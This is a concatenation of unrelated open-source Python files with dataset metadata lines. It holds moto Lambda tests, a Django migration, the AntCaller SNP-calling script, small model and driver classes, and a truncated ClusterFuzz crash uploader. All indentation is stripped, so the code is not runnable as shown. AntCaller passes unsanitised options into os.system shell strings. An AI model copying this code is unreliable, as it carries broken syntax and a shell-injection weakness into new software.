FunctionName=function_name, InvocationType="Event", Payload="{}"
)
response = success_result["Payload"].read()
functions = json.loads(response.decode("utf-8"))["response"]
function_names = [f["FunctionName"] for f in functions]
function_names.should.contain(function_name)
@pytest.mark.network
@mock_lambda
def test_invoke_function_with_multiple_files_in_zip():
conn = boto3.client("lambda", _lambda_region)
function_name = str(uuid4())[0:6]
conn.create_function(
FunctionName=function_name,
Runtime="python3.7",
Role=get_role_name(),
Handler="lambda_function.lambda_handler",
Code={"ZipFile": get_zip_with_multiple_files()},
Description="test lambda function",
Timeout=3,
MemorySize=128,
Publish=True,
)
in_data = {"msg": "So long and thanks for: "}
success_result = conn.invoke(
FunctionName=function_name, InvocationType="Event", Payload=json.dumps(in_data)
)
json.loads(success_result["Payload"].read().decode("utf-8")).should.equal(
{"msg": "So long and thanks for: stuff"}
)
@pytest.mark.network
@mock_lambda
def test_invoke_dryrun_function():
conn = boto3.client("lambda", _lambda_region)
function_name = str(uuid4())[0:6]
conn.create_function(
FunctionName=function_name,
Runtime="python2.7",
Role=get_role_name(),
Handler="lambda_function.lambda_handler",
Code={"ZipFile": get_test_zip_file1(),},
Description="test lambda function",
Timeout=3,
MemorySize=128,
Publish=True,
)
conn.invoke.when.called_with(
FunctionName="notAFunction", InvocationType="Event", Payload="{}"
).should.throw(botocore.client.ClientError)
in_data = {"msg": "So long and thanks for all the fish"}
success_result = conn.invoke(
FunctionName=function_name,
InvocationType="DryRun",
Payload=json.dumps(in_data),
)
success_result["StatusCode"].should.equal(204)
if settings.TEST_SERVER_MODE:
@mock_ec2
@mock_lambda
def test_invoke_function_get_ec2_volume():
conn = boto3.resource("ec2", _lambda_region)
vol = conn.create_volume(Size=99, AvailabilityZone=_lambda_region)
vol = conn.Volume(vol.id)
conn = boto3.client("lambda", _lambda_region)
function_name = str(uuid4())[0:6]
conn.create_function(
FunctionName=function_name,
Runtime="python3.7",
Role=get_role_name(),
Handler="lambda_function.lambda_handler",
Code={"ZipFile": get_test_zip_file2()},
Description="test lambda function",
Timeout=3,
MemorySize=128,
Publish=True,
)
in_data = {"volume_id": vol.id}
result = conn.invoke(
FunctionName=function_name,
InvocationType="RequestResponse",
Payload=json.dumps(in_data),
)
result["StatusCode"].should.equal(200)
actual_payload = json.loads(result["Payload"].read().decode("utf-8"))
expected_payload = {"id": vol.id, "state": vol.state, "size": vol.size}
actual_payload.should.equal(expected_payload)
@pytest.mark.network
@mock_lambda
def test_invoke_lambda_error():
lambda_fx = """
def lambda_handler(event, context):
raise Exception('failsauce')
"""
zip_output = io.BytesIO()
zip_file = zipfile.ZipFile(zip_output, "w", zipfile.ZIP_DEFLATED)
zip_file.writestr("lambda_function.py", lambda_fx)
zip_file.close()
zip_output.seek(0)
client = boto3.client("lambda", region_name="us-east-1")
client.create_function(
FunctionName="test-lambda-fx",
Runtime="python2.7",
Role=get_role_name(),
Handler="lambda_function.lambda_handler",
Description="test lambda function",
Timeout=3,
MemorySize=128,
Publish=True,
Code={"ZipFile": zip_output.read()},
)
result = client.invoke(
FunctionName="test-lambda-fx", InvocationType="RequestResponse", LogType="Tail"
)
assert "FunctionError" in result
assert result["FunctionError"] == "Handled"
@pytest.mark.network
@pytest.mark.parametrize("key", ["FunctionName", "FunctionArn"])
@mock_lambda
def test_invoke_async_function(key):
conn = boto3.client("lambda", _lambda_region)
function_name = str(uuid4())[0:6]
fxn = conn.create_function(
FunctionName=function_name,
Runtime="python2.7",
Role=get_role_name(),
Handler="lambda_function.lambda_handler",
Code={"ZipFile": get_test_zip_file1()},
Description="test lambda function",
Timeout=3,
MemorySize=128,
Publish=True,
)
name_or_arn = fxn[key]
success_result = conn.invoke_async(
FunctionName=name_or_arn, InvokeArgs=json.dumps({"test": "event"})
)
success_result["Status"].should.equal(202)
@pytest.mark.network
@mock_lambda
def test_invoke_function_large_response():
# AWS Lambda should only return bodies smaller than 6 MB
conn = boto3.client("lambda", _lambda_region)
fxn = conn.create_function(
FunctionName=str(uuid4())[0:6],
Runtime="python3.7",
Role=get_role_name(),
Handler="lambda_function.lambda_handler",
Code={"ZipFile": get_test_zip_largeresponse()},
Description="test lambda function",
Timeout=3,
MemorySize=128,
Publish=True,
)
resp = conn.invoke(FunctionName=fxn["FunctionArn"])
resp.should.have.key("FunctionError").equals("Unhandled")
payload = resp["Payload"].read().decode("utf-8")
payload = json.loads(payload)
payload.should.equal(
{
"errorMessage": "Response payload size exceeded maximum allowed payload size (6291556 bytes).",
"errorType": "Function.ResponseSizeTooLarge",
}
)
# Absolutely fine when invoking async
resp = conn.invoke(FunctionName=fxn["FunctionArn"], InvocationType="Event")
resp.shouldnt.have.key("FunctionError")
|
spulec/moto
|
tests/test_awslambda/test_lambda_invoke.py
|
Python
|
apache-2.0
| 12,840
|
for x in range(1, 10):
print x
|
caot/intellij-community
|
python/testData/console/indent1.after.py
|
Python
|
apache-2.0
| 33
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('naf_autoticket', '0037_auto_20161230_0136'),
]
operations = [
migrations.RenameField(
model_name='incidentqueue',
old_name='createdIcident',
new_name='createdIncident',
),
]
|
kevinnguyeneng/django-uwsgi-nginx
|
app/naf_autoticket/migrations/0038_auto_20161230_0136.py
|
Python
|
gpl-3.0
| 418
|
#!/usr/bin/env python
from __future__ import division
from optparse import OptionParser
from optparse import OptionGroup
from multiprocessing.dummy import Pool as ThreadPool
import numpy as np
import sys
import math
import os
import re
usage = "usage: python %prog <SAM formatted data with MD field present from stdin> [options] "
parser = OptionParser(usage=usage, version="%prog v1.0")
group = OptionGroup(parser,"pileup options","parameter setting for pileup reads")
group.add_option("--pileup", action="store_true", dest="pileup",help="pileup reads from sam file",default=False)
parser.add_option_group(group)
group = OptionGroup(parser,"extract damage information options","parameter setting for extracting damage information")
group.add_option("--extract", action="store_true", dest="extract",help="extract damage information from sam/bam file",default=False)
group.add_option("-l", "--length", action="store", type="int", dest="length",help="the length of the longest reads", default=300)
parser.add_option_group(group)
group = OptionGroup(parser,"snp calling options","parameter setting for snp calling")
group.add_option("--snpcalling", action="store_true", dest="snpcalling",help="call snp after pileup and damageinfo",default=False)
group.add_option("-f", "--pileupfile", action="store", type="string", dest="pileupfile",help="input pileup file for snp calling")
group.add_option("-d", "--damageinfo", action="store", type="string", dest="damageinfo",help="input the file that stores the damage information")
group.add_option("-p", "--ploidy", action="store", type="int", dest="ploidy",help="ploidy of the genome",default=2)
group.add_option("-a", "--allsite", action="store_true", dest="allsite",help="output snp of all site",default=False)
group.add_option("-q", "--quality", action="store", type="float", dest="quality",help="threshold of variant quality",default=20.0)
parser.add_option_group(group)
parser.add_option("-o", "--outputprefix", action="store", type="string", dest="outputprefix",help="the prefix of output file")
parser.add_option("-t", "--thread", action="store", type="int", dest="thread",help="the number of thread (not for extracting damage information )", default=5)
(options, args) = parser.parse_args()
wdpath = os.getcwd()
# program of pileup
if options.pileup:
headname = wdpath + '/' + options.outputprefix + '.header'
fhead = open(headname, 'w')
chr_list = []
fsplit = []
# split the sam/bam file
for line in sys.stdin:
if line[0] == '@':
fhead.write(line)
continue
col = line.split('\t')
chromosome = col[2]
if chromosome == '*':
continue
if not chr_list:
chr_list.append(chromosome)
splitname = wdpath + '/' + options.outputprefix + '.temporary.1'
fsplit = open(splitname, 'w')
fsplit.write(line)
continue
if chromosome != chr_list[-1]:
fsplit.close()
chr_list.append(chromosome)
splitname = wdpath + '/' + options.outputprefix + '.temporary.' + str(len(chr_list))
fsplit = open(splitname, 'w')
fsplit.write(line)
else:
fsplit.write(line)
fhead.close()
fsplit.close()
temp_list = range(1,len(chr_list)+1)
temp_list.reverse()
# end of spliting the sam/bam file
def split(para):
os.system('cat ' + options.outputprefix + '.temporary.' + str(para) + ' | python AntCaller_pileup.py > ' + options.outputprefix + '.pileup.' + str(para))
pool = ThreadPool(options.thread)
pool.map(split, temp_list)
pool.close()
pool.join()
temp_list.reverse()
# combine files
fpilename = wdpath + '/' + options.outputprefix + '.AntCaller.pileup'
fpile = open(fpilename, 'w')
# add header
fhead = open(headname, 'r')
for line in fhead:
if line:
fpile.write(line)
fhead.close()
colname = '@chr' + '\t' + 'position' + '\t' + 'ref' + '\t' + 'num' + '\t' + 'base' + '\t' + 'quality' + '\t' + '3-end' +'\t' + '5-end' + '\t' + 'MQ' + '\n'
fpile.write(colname)
for i in temp_list:
fopenname = wdpath + '/' + options.outputprefix + '.pileup.' + str(i)
fopen = open(fopenname, 'r')
for line in fopen:
if line:
fpile.write(line)
fopen.close()
delete_com = options.outputprefix + '.temporary.' + str(i)
delete_pile = options.outputprefix + '.pileup.' + str(i)
if os.path.exists(delete_com):
os.remove(delete_com)
if os.path.exists(delete_pile):
os.remove(delete_pile)
fpile.close()
# delete header
headname2 = options.outputprefix + '.header'
if os.path.exists(headname2):
os.remove(headname2)
# program of extracting damage information
if options.extract:
# define the cigar_mode
cigar_mode = re.compile("([0-9]*)([A-Z])")
def damageinfo(inread, inmd):
read_ref = ''
readlen = len(inread)
pos_five = 0
c2t = 0
g2a = 0
subinfo = ''
mdlist = re.findall('(\d+|\D+)', inmd)
for e in mdlist:
if e.isdigit():
read_ref += inread[pos_five:pos_five + int(e)]
pos_five += int(e)
elif '^'in e:
continue
elif e.isalpha():
read_ref += e
ncount_other_five[pos_five] += 1
ncount_other_three[readlen - pos_five - 1] += 1
if e == 'C' and inread[pos_five] == 'T':
c2t += 1
ncount_c2t_five[pos_five] += 1
ncount_c2t_three[readlen - pos_five - 1] += 1
pos_five += 1
pos_three = readlen - pos_five + 1
subinfo = subinfo + '|' + str(pos_five) + 'T' + str(pos_three)
elif e == 'G' and inread[pos_five] == 'A':
g2a += 1
ncount_g2a_five[pos_five] += 1
ncount_g2a_three[readlen - pos_five - 1] += 1
pos_five += 1
pos_three = readlen - pos_five + 1
subinfo = subinfo + '|' + str(pos_five) + 'A' + str(pos_three)
else:
pos_five += 1
read_reflen = len(read_ref)
for i in range(read_reflen):
n_count[i] += 1
if read_ref[i] == 'C':
ncount_c_five[i] += 1
ncount_c_three[read_reflen - i - 1] += 1
elif read_ref[i] == 'G':
ncount_g_five[i] += 1
ncount_g_three[read_reflen - i - 1] += 1
subinfo = repr(c2t) + 'T' + repr(g2a) + 'A' + subinfo
return subinfo
f2name = wdpath + '/' + options.outputprefix + '.damageinfo'
f2 = open(f2name, 'w')
# record the count from five end
n_count = [0] * options.length
ncount_c2t_five = [0] * options.length
ncount_g2a_five = [0] * options.length
ncount_c2t_three = [0] * options.length
ncount_g2a_three = [0] * options.length
ncount_c_five = [0] * options.length
ncount_c_three = [0] * options.length
ncount_g_five = [0] * options.length
ncount_g_three = [0] * options.length
ncount_other_five = [0] * options.length
ncount_other_three = [0] * options.length
# read each line and process
for line in sys.stdin:
if '@' in line[0]:
continue
col = line.split('\t')
read = col[9]
read_325 = read[::-1]
cigar = col[5]
try:
MD = line.split('MD:Z:')[1].split()[0].rstrip('\n')
except IndexError:
print ("This file has sequence without MD filed")
continue
# if I and S exist, create new read for damage information or reads directly
if 'I' in cigar or 'S' in cigar:
newread = ''
cigarcount = 0
cigarcomponents = cigar_mode.findall(cigar)
for p in cigarcomponents:
if 'I' in p[1]:
cigarcount += int(p[0])
elif 'S' in p[1]:
cigarcount += int(p[0])
else:
cigarcount2 = cigarcount + int(p[0])
newread += read[cigarcount:cigarcount2]
cigarcount = cigarcount2
damagetag = damageinfo(newread, MD)
else:
damagetag = damageinfo(read, MD)
f2.write("total_count" + '\t' + "c_5end" + '\t' + "g_5end" + '\t' + "other_5end" + '\t' + "c2t_5end" + '\t' + "g2a_5end" + '\t' +
"c_3end" + '\t' + "g_3end" + '\t' + "other_3end" + '\t' + "c2t_3end" + '\t' + "g2a_3end" + '\n')
for j in range(len(n_count)):
f2.write(str(n_count[j]) + '\t' + str(ncount_c_five[j]) + '\t' + str(ncount_g_five[j]) + '\t' + str(ncount_other_five[j]) + '\t' + str(ncount_c2t_five[j]) + '\t' + str(ncount_g2a_five[j]) + '\t' +
str(ncount_c_three[j]) + '\t' + str(ncount_g_three[j]) + '\t' + str(ncount_other_three[j]) + '\t' + str(ncount_c2t_three[j]) + '\t' + str(ncount_g2a_three[j]) + '\n')
f2.close()
if options.snpcalling:
quality = options.quality
if options.allsite:
quality = 0.0
if options.ploidy == 2:
fpileupname = wdpath + '/' + options.pileupfile
fpileup = open(fpileupname, 'r')
nline = 0
for line in fpileup:
if line[0] != '@':
nline += 1
fpileup.close()
line_each = int(nline/options.thread) + 1
fpileup = open(fpileupname, 'r')
filenum = 1
filesplitname = wdpath + '/'+ options.outputprefix + '.temporary.pileup.' + str(filenum)
filesplit = open(filesplitname, 'w')
linecount = 0
for line in fpileup:
if line[0] == '@':
continue
filesplit.write(line)
linecount += 1
if linecount == line_each:
filesplit.close()
filenum += 1
filesplitname = wdpath + '/'+ options.outputprefix + '.temporary.pileup.' + str(filenum)
filesplit = open(filesplitname, 'w')
linecount = 0
filesplit.close()
fpileup.close()
if options.allsite:
def split2(para):
os.system('python AntCaller_snpcalling.py -f ' + options.outputprefix + '.temporary.pileup.' + str(para) + ' -d ' + options.damageinfo + ' -o ' + options.outputprefix + str(para) + ' -q ' + str(quality) + ' -a')
else:
def split2(para):
os.system('python AntCaller_snpcalling.py -f ' + options.outputprefix + '.temporary.pileup.' + str(para) + ' -d ' + options.damageinfo + ' -o ' + options.outputprefix + str(para) + ' -q ' + str(quality))
pool = ThreadPool(options.thread)
pool.map(split2, range(1, options.thread + 1))
pool.close()
pool.join()
fvcfname = wdpath + '/'+ options.outputprefix + '.vcf'
fvcf = open(fvcfname, 'w')
fvcf.write('#CHROM' + '\t' + 'POS' + '\t' + 'ID' + '\t' + 'REF' + '\t' + 'ALT' + '\t' + 'QUAL' + '\t' + 'FILTER' + '\t' + 'INFO' + '\t' + 'FORMAT' + '\t' + options.outputprefix + '\n')
for i in range(1, options.thread + 1):
f2splitname = wdpath + '/'+ options.outputprefix + str(i) + '.vcf'
f2split = open(f2splitname, 'r')
for line in f2split:
fvcf.write(line)
f2split.close()
filesplitname = options.outputprefix + '.temporary.pileup.' + str(i)
os.remove(f2splitname)
os.remove(filesplitname)
fvcf.close()
if options.ploidy == 1:
rr = 0.001
homo = (1 - 0.001)/2.0
FORMAT = 'GT:AD:DP:GQ:PL'
# calculate the substitution rate
fname = wdpath + '/' + options.damageinfo
f = open(fname, 'r')
c2t_rate = []
g2a_rate = []
for line in f:
col = line.split('\t')
if not col[0].isdigit():
continue
if int(col[0]) == 0:
break
if int(col[1]) != 0:
c2t_rate.append(int(col[4])/int(col[1]) + 0.0001)
else:
c2t_rate.append(0.0001)
if int(col[7]) != 0:
g2a_rate.append(int(col[10])/int(col[7]) + 0.0001)
else:
g2a_rate.append(0.0001)
f.close()
# function of calculate error rate
def error(b):
return pow(10.0, (33.0 - ord(b))/10.0)
# function of calculating probability of 10 genotype
def prob_cal(p_in):
return sum(p_GD[:p_in]) + sum(p_GD[p_in+1:])
# function of which
def which(a, b):
for j in range(len(a)):
if a[j] == b:
return j
f1name = wdpath + '/' + options.pileupfile # read the pileup file
f1 = open(f1name, 'r')
f2name = wdpath + '/' + options.outputprefix + '.vcf'
f2 = open(f2name, 'w')
f2.write('#CHROM' + '\t' + 'POS' + '\t' + 'ID' + '\t' + 'REF' + '\t' + 'ALT' + '\t' + 'QUAL' + '\t' + 'FILTER' + '\t' + 'INFO' + '\t' + 'FORMAT' + '\t' + options.outputprefix + '\n')
# process each line of sam file
for line in f1:
if '@' in line[0]:
continue
col = line.split('\t')
chromosome = col[0]
position = col[1]
ref = col[2]
count = int(col[3])
if count < 2:
continue
Nt = col[4]
quals = col[5]
pos5 = col[6].split(',')
pos3 = col[7].split(',')
Mquals = col[8].split(',')
genotype = ['A', 'G', 'C', 'T']
A_count = 0
G_count = 0
C_count = 0
T_count = 0
p_A = 1
p_G = 1
p_C = 1
p_T = 1
for n in range(count):
r = error(quals[n]) + 0.001 + 1.0/pow(10.0, int(Mquals[n])/10.0)
if r > 0.2:
continue
q = g2a_rate[int(pos3[n]) - 1]
p = c2t_rate[int(pos5[n]) - 1]
if Nt[n] == 'A' or Nt[n] == 'a':
A_count += 1
if Nt[n] == 'A':
p_A *= 1.0 - r
p_G *= (1.0 - r)*q + r*(1.0-q)/3.0
p_C *= r/3.0
p_T *= r/3.0
else:
p_A *= 1.0 - r
p_G *= p*(1.0 - r) + r*(1.0 - p)/3.0
p_C *= r/3.0
p_T *= r/3.0
elif Nt[n] == 'G' or Nt[n] == 'g':
G_count += 1
if Nt[n] == 'G':
p_A *= r/3.0
p_G *= (1.0 - q)*(1.0 - r) + r*q/3.0
p_C *= r/3.0
p_T *= r/3.0
else:
p_A *= r/3.0
p_G *= (1.0 - p)*(1.0 - r) + r*p/3.0
p_C *= r/3.0
p_T *= r/3.0
elif Nt[n] == 'C' or Nt[n] == 'c':
C_count += 1
if Nt[n] == 'C':
p_A *= r/3.0
p_G *= r/3.0
p_C *= (1.0 - p)*(1.0 - r) + r*p/3.0
p_T *= r/3.0
else:
p_A *= r/3.0
p_G *= r/3.0
p_C *= (1.0 - q)*(1.0 - r) + r*q/3.0
p_T *= r/3.0
elif Nt[n] == 'T' or Nt[n] == 't':
T_count += 1
if Nt[n] == 'T':
p_A *= r/3.0
p_G *= r/3.0
p_C *= p*(1.0 - r) + r*(1.0 - p)/3.0
p_T *= 1.0 - r
else:
p_A *= r/3.0
p_G *= r/3.0
p_C *= (1.0 - r)*q + r*(1.0-q)/3.0
p_T *= 1.0 - r
else:
continue
p_DG = np.array([p_A, p_G, p_C, p_T])
p_GD = p_DG/sum(p_DG)
if 0 in p_GD:
for i in range(len(p_GD)):
if p_GD[i] == 0:
p_GD[i] = 1.000000000000017e-308
max_pos = p_GD.argmax()
alt = genotype[max_pos]
count_list = np.array([A_count, G_count, C_count, T_count])
if options.allsite:
if ref == alt:
ALT = '.'
Qual = round(-10.0 * math.log(prob_cal(max_pos), 10.0), 2)
INFO = 'AC=0;AF=0.00;AN=1;DP=' + str(count)
PL = int(round(-10.0*math.log(p_GD[max_pos], 10.0)))
Sample1 = '0:' + str(count_list[max_pos]) + ',' + str(sum(count_list)-count_list[max_pos]) + ':' + str(count) + ':' +str(Qual)+ ':' + str(PL)
f2.write(chromosome + '\t' + position + '\t' + '.' + '\t' + ref + '\t' + ALT + '\t' + str(Qual) + '\t' + '.' + '\t' + INFO + '\t' + FORMAT + '\t' + Sample1 + '\n')
else:
ALT = alt
Qual = round(-10.0 * math.log(p_GD[which(genotype, ref)], 10.0), 2)
INFO = 'AC=1;AF=1.00;AN=1;DP=' + str(count)
PL = str(int(round(-10.0*math.log(p_GD[which(genotype, ref)], 10.0)))) + ',' + str(int(round(-10.0*math.log(p_GD[which(genotype, alt)], 10.0))))
Sample1 = '1:' + str(count_list[which(genotype, ref)]) + ',' + str(sum(count_list)-count_list[which(genotype, ref)]) + ':' + str(count) + ':' +str(Qual)+ ':' + str(PL)
f2.write(chromosome + '\t' + position + '\t' + '.' + '\t' + ref + '\t' + ALT + '\t' + str(Qual) + '\t' + '.' + '\t' + INFO + '\t' + FORMAT + '\t' + Sample1 + '\n')
elif ref != alt:
Qual = round(-10.0 * math.log(p_GD[which(genotype, ref)], 10.0), 2)
if Qual < quality:
continue
ALT = alt
Qual = round(-10.0 * math.log(p_GD[which(genotype, ref)], 10.0), 2)
INFO = 'AC=1;AF=1.00;AN=1;DP=' + str(count)
PL = str(int(round(-10.0*math.log(p_GD[which(genotype, ref)], 10.0)))) + ',' + str(int(round(-10.0*math.log(p_GD[which(genotype, alt)], 10.0))))
Sample1 = '1:' + str(count_list[which(genotype, ref)]) + ',' + str(sum(count_list)-count_list[which(genotype, ref)]) + ':' + str(count) + ':' +str(Qual)+ ':' + str(PL)
f2.write(chromosome + '\t' + position + '\t' + '.' + '\t' + ref + '\t' + ALT + '\t' + str(Qual) + '\t' + '.' + '\t' + INFO + '\t' + FORMAT + '\t' + Sample1 + '\n')
f2.close()
if os.path.exists(options.pileupfile):
os.remove(options.pileupfile)
|
BoyanZhou/AntCaller
|
AntCaller-1.1.py
|
Python
|
gpl-3.0
| 19,523
|
__author__ = 'Andy'
from whirlybird.protocols import pilot_input_pb2
class InputDriverBase(object):
def __init__(self, transport):
self.transport = transport
def _to_integer(self, value):
return int(value * 255 + 255)
def emit(self,
left_stick_x,
left_stick_y,
right_stick_y,
right_stick_x,
triggers):
to_emit = pilot_input_pb2.PilotInput()
to_emit.left_stick_x = self._to_integer(left_stick_x)
to_emit.left_stick_y = self._to_integer(left_stick_y)
to_emit.right_stick_y = self._to_integer(right_stick_y)
to_emit.right_stick_x = self._to_integer(right_stick_x)
to_emit.triggers = self._to_integer(triggers)
# print('LX: {}, LY: {}, RX: {}, RY: {}, Trigger: {}'. format(to_emit.left_stick_x,
# to_emit.left_stick_y,
# to_emit.right_stick_x,
# to_emit.right_stick_y,
# to_emit.triggers))
self.transport.emit(to_emit.SerializeToString())
|
levisaya/whirlybird
|
whirlybird/client/input_drivers/input_driver_base.py
|
Python
|
mit
| 1,271
|
from sqlalchemy import Column, String, Integer
from BusTrack.repository import Base, session
from BusTrack.repository.models import STRING_LEN_SMALL
class UserType(Base):
__tablename__ = 'user_type'
id = Column(Integer, primary_key=True)
role_name = Column(String(STRING_LEN_SMALL))
@staticmethod
def __create_default_role__():
if session.query(UserType).count() != 0:
return
driver = UserType()
driver.role_name = 'Driver'
parent = UserType()
parent.role_name = 'Parent'
admin = UserType()
admin.role_name = 'Admin'
session.add(driver)
session.add(parent)
session.add(admin)
session.commit()
session.close()
|
Rjtsahu/School-Bus-Tracking
|
BusTrack/repository/models/UserType.py
|
Python
|
gpl-3.0
| 743
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Crash minidump and symbols uploader."""
import email
import os
import re
import tempfile
import requests
from clusterfuzz._internal.base import utils
from clusterfuzz._internal.build_management import revisions
from clusterfuzz._internal.crash_analysis.stack_parsing import stack_parser
from clusterfuzz._internal.datastore import data_handler
from clusterfuzz._internal.datastore import data_types
from clusterfuzz._internal.google_cloud_utils import blobs
from clusterfuzz._internal.metrics import logs
from clusterfuzz._internal.platforms.android import adb
from clusterfuzz._internal.platforms.android import constants
from clusterfuzz._internal.protos import process_state_pb2
from clusterfuzz._internal.system import environment
from clusterfuzz._internal.system import process_handler
CRASH_REPORT_UPLOAD_URL = {
'staging': 'https://clients2.google.com/cr/staging_report',
'prod': 'https://clients2.google.com/cr/report',
}
BOT_ID_KEY = 'botId'
CF_ID_KEY = 'clusterfuzzId'
CRASH_DUMP_PATH_MARKER = 'Output crash dump:'
PRODUCT_KEY = 'product'
PRODUCT_MAP = {
'ANDROID': 'Chrome_Android',
'LINUX': 'Chrome_Linux',
'MAC': 'Chrome_Mac',
'WINDOWS': 'Chrome',
}
PROCESSED_REPORT_FILE_KEY = 'processedReport'
MINIDUMP_FILE_KEY = 'upload_file_minidump'
VERSION_KEY = 'version'
def post_with_retries(upload_url, params, files):
"""Perform HTTP POST request to given upload url with provided params."""
retry_limit = environment.get_value('FAIL_RETRIES')
for _ in range(retry_limit):
try:
result = requests.post(upload_url, data=params, files=files)
if result.status_code == requests.codes.ok:
return result.text
# No need to retry on a non-200 status code.
logs.log_error(
'Failed to upload request, error code %d.' % result.status_code)
return None
except Exception:
# To catch cases like connection error, timeout error, etc.
logs.log_warn('Failed to upload request, retrying.')
logs.log_error('Could not upload request after retries.')
return None
class FileMetadataInfo(object):
"""Handles file metadata for e.g. minidumps and processed reports."""
def __init__(self, path=None, key=None, contents=None):
self._path = path
self._key = key
self._contents = contents
@property
def path(self):
return self._path
@path.setter
def path(self, local_path):
self._path = local_path
@property
def key(self):
return self._key
@key.setter
def key(self, key):
self._key = key
@property
def contents(self):
return self._contents
@contents.setter
def contents(self, contents):
self._contents = contents
def get_file_handle(self):
"""Return file handle to metadata contents. Prefer to use blobstore key if
available, otherwise raw contents."""
if self.key:
contents = blobs.read_key(self.key)
elif self.contents:
contents = self.contents
else:
# No bot-independent file for which to get a file handle. Let the caller
# handle any errors.
return None
metadata_file = tempfile.TemporaryFile()
metadata_file.write(contents)
metadata_file.seek(0)
return metadata_file
class CrashReportInfo(object):
"""Stores the data collected from a run (via stacktrace or other) to be
used in uploading to Chromecrash."""
def __init__(self,
minidump_path=None,
minidump_contents=None,
minidump_key=None,
product=None,
version=None,
optional_params=None,
unsymbolized_stacktrace=None,
symbolized_stacktrace=None,
testcase_id=None,
bot_id=None,
serialized_crash_stack_frames=None):
self._minidump_info = FileMetadataInfo(
path=minidump_path, contents=minidump_contents, key=minidump_key)
self._minidump_path = minidump_path
self._product = product
self._version = version
if optional_params is None:
self._optional_params = {}
else:
self._optional_params = optional_params
self._unsymbolized_stacktrace = unsymbolized_stacktrace
self._symbolized_stacktrace = symbolized_stacktrace
self._testcase_id = testcase_id
self._bot_id = bot_id
self._serialized_crash_stack_frames = serialized_crash_stack_frames
@property
def minidump_info(self):
return self._minidump_info
@minidump_info.setter
def minidump_info(self, minidump_info):
self._minidump_info = minidump_info
@property
def product(self):
return self._product
@product.setter
def product(self, product):
self._product = product
@property
def version(self):
return self._version
@version.setter
def version(self, version):
self._version = version
@property
def optional_params(self):
return self._optional_params
@optional_params.setter
def optional_params(self, params):
self._optional_params = params
@property
def unsymbolized_stacktrace(self):
return self._unsymbolized_stacktrace
@unsymbolized_stacktrace.setter
def unsymbolized_stacktrace(self, stacktrace):
self._unsymbolized_stacktrace = stacktrace
@property
def symbolized_stacktrace(self):
return self._symbolized_stacktrace
@symbolized_stacktrace.setter
def symbolized_stacktrace(self, stacktrace):
self._symbolized_stacktrace = stacktrace
@property
def testcase_id(self):
return self._testcase_id
@testcase_id.setter
def testcase_id(self, testcase_id):
self._testcase_id = testcase_id
@property
def bot_id(self):
return self._bot_id
@bot_id.setter
def bot_id(self, bot_id):
self._bot_id = bot_id
@property
def serialized_crash_stack_frames(self):
return self._serialized_crash_stack_frames
@serialized_crash_stack_frames.setter
def serialized_crash_stack_frames(self, serialized_crash_stack_frames):
self._serialized_crash_stack_frames = serialized_crash_stack_frames
def upload(self):
"""Upload the minidump represented by self, with any other params to send
along with the POST request."""
if self.product is None or self.version is None:
logs.log_error('Missing product/version info, cannot upload.')
return None
report_file = FileMetadataInfo(
contents=self.serialized_crash_stack_frames).get_file_handle()
if report_file is None:
logs.log_warn('Missing processed report, falling back to minidump.')
# Get minidump if there is one, but don't worry if there isn't. Just having
# a report file is fine.
minidump_file = self.minidump_info.get_file_handle()
if report_file is None and minidump_file is None:
logs.log_error('Neither processed report nor minidump, nothing to '
'upload.')
return None
# Build the upload parameters.
params = {}
params[PRODUCT_KEY] = self.product
params[VERSION_KEY] = self.version
if self.testcase_id is not None:
params[CF_ID_KEY] = self.testcase_id
if self.bot_id is not None:
params[BOT_ID_KEY] = self.bot_id
files = {}
if report_file is not None:
files[PROCESSED_REPORT_FILE_KEY] = report_file
if minidump_file is not None:
files[MINIDUMP_FILE_KEY] = minidump_file
# Send off the report, returning the report ID.
mode = environment.get_value('UPLOAD_MODE')
if not mode or mode not in CRASH_REPORT_UPLOAD_URL:
logs.log_warn(
'Missing or unknown mode (%s); uploading to staging.' % str(mode))
mode = 'staging'
return post_with_retries(CRASH_REPORT_UPLOAD_URL[mode], params, files)
def store_minidump(self):
"""Store the crash minidump in appengine and return key."""
if not self.minidump_info.path:
return ''
minidump_key = ''
logs.log('Storing minidump (%s) in blobstore.' % self.minidump_info.path)
try:
minidump_key = ''
with open(self.minidump_info.path, 'rb') as file_handle:
minidump_key = blobs.write_blob(file_handle)
except:
logs.log_error('Failed to store minidump.')
if minidump_key:
self.minidump_info = FileMetadataInfo(
path=self.minidump_info.path, key=minidump_key)
return minidump_key
def to_report_metadata(self):
"""Export to ReportMetadata for batching upload."""
return data_types.ReportMetadata(
product=self.product,
version=str(self.version),
minidump_key=self.minidump_info.key,
serialized_crash_stack_frames=self.serialized_crash_stack_frames,
testcase_id=str(self.testcase_id),
bot_id=str(self.bot_id))
def crash_report_info_from_metadata(report_metadata):
"""Return CrashReportInfo given ReportMetadata for uploading."""
return CrashReportInfo(
product=report_metadata.product,
version=report_metadata.version,
minidump_key=report_metadata.minidump_key,
serialized_crash_stack_frames=(
report_metadata.serialized_crash_stack_frames),
testcase_id=(report_metadata.testcase_id or None),
bot_id=(report_metadata.bot_id or None))
def parse_mime_to_crash_report_info(local_minidump_mime_path):
"""Read the (local) minidump MIME file into a CrashReportInfo object."""
# Get the minidump name and path.
minidump_path_match = re.match(r'(.*)\.mime', local_minidump_mime_path)
if minidump_path_match is None:
logs.log_error('Minidump filename in unexpected format: \'%s\'.' %
local_minidump_mime_path)
return None
minidump_path = '%s.dmp' % minidump_path_match.group(1).strip()
# Reformat the minidump MIME to include the boundary.
with open(local_minidump_mime_path, 'rb') as minidump_mime_file_content:
# The boundary is the first line after the first two dashes.
boundary = minidump_mime_file_content.readline().strip()[2:]
minidump_mime_bytes = (
b'Content-Type: multipart/form-data; boundary=\"%s\"\r\n--%s\r\n' %
(boundary, boundary))
minidump_mime_bytes += minidump_mime_file_content.read()
minidump_mime_contents = email.message_from_bytes(minidump_mime_bytes)
# Parse the MIME contents, extracting the parameters needed for upload.
mime_key_values = {}
for mime_part in minidump_mime_contents.get_payload():
if isinstance(mime_part, str):
